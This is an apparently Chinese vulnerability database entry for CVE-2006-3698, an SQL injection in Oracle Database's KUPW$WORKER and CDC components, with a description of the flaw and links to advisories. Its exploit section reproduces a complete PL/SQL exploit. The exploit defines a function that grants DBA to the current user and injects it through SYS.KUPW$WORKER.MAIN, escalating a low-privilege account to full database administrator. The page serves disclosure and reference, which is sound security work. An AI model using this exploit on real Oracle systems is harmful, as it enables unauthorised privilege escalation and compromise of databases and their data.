Oracle Database多个未明安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112094 漏洞类型 SQL注入
发布时间 2007-01-23 更新时间 2007-01-23
CVE编号 CVE-2006-3698 CNNVD-ID CNNVD-200607-365
漏洞平台 Multiple CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/3178
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-365
|漏洞详情
OracleDatabase是一款商业性质大型数据库系统。Oracle发布了2006年7月的紧急补丁更新公告,修复了多个Oracle产品中的多个漏洞。这些漏洞影响Oracle产品的所有安全属性,可导致本地和远程的威胁。其中一些漏洞可能需要各种级别的授权,但也有些不需要任何授权。最严重的漏洞可能导致完全入侵数据库系统。OracleDatabase多个未明安全漏洞,存在未明影响和攻击向量,akaOracleV编号为#(1)DB01ChangeDataCapture(CDC)componentand(2)DB03DataPumpMetadataAPI.
|漏洞EXP
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <joxeankoret@yahoo.es>
* Privileges needed:
*
* - CREATE SESSION
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;

CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO TEST';
COMMIT;
RETURN(1);
END;
/

DECLARE
MASTER_NAME VARCHAR2(200);
MASTER_OWNER VARCHAR2(200);
BEGIN
MASTER_NAME := ''' or ' || user || '.f1=1--';
MASTER_OWNER := 'bla';
SYS.KUPW$WORKER.MAIN(
MASTER_NAME => MASTER_NAME,
MASTER_OWNER => MASTER_OWNER
);
END;
/

select *
from user_role_privs
;

// milw0rm.com [2007-01-23]
|参考资料

来源:US-CERT
名称:TA06-200A
链接:http://www.us-cert.gov/cas/techalerts/TA06-200A.html
来源:BID
名称:19054
链接:http://www.securityfocus.com/bid/19054
来源:MISC
链接:http://www.red-database-security.com/advisory/oracle_cpu_july_2006.html
来源:www.oracle.com
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2006.html
来源:VUPEN
名称:ADV-2006-2863
链接:http://www.frsirt.com/english/advisories/2006/2863
来源:HP
名称:SSRT061201
链接:http://www.securityfocus.com/archive/1/archive/1/440758/100/100/threaded
来源:BUGTRAQ
名称:20060718OracleDatabase-SQLInjectioninSYS.DBMS_CDC_IMPDP[DB01]
链接:http://www.securityfocus.com/archive/1/archive/1/440440/100/0/threaded
来源:BUGTRAQ
名称:20060718OracleDatabase-SQLInjectioninSYS.KUPW$WORKER[DB03]
链接:http://www.securityfocus.com/archive/1/archive/1/440439/100/0/threaded
来源:MISC
链接:http://www.red-database-security.com/advisory/oracle_sql_injection_kupw$worker.html
来源:MISC
链接:http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_cdc_impdp.html
来源: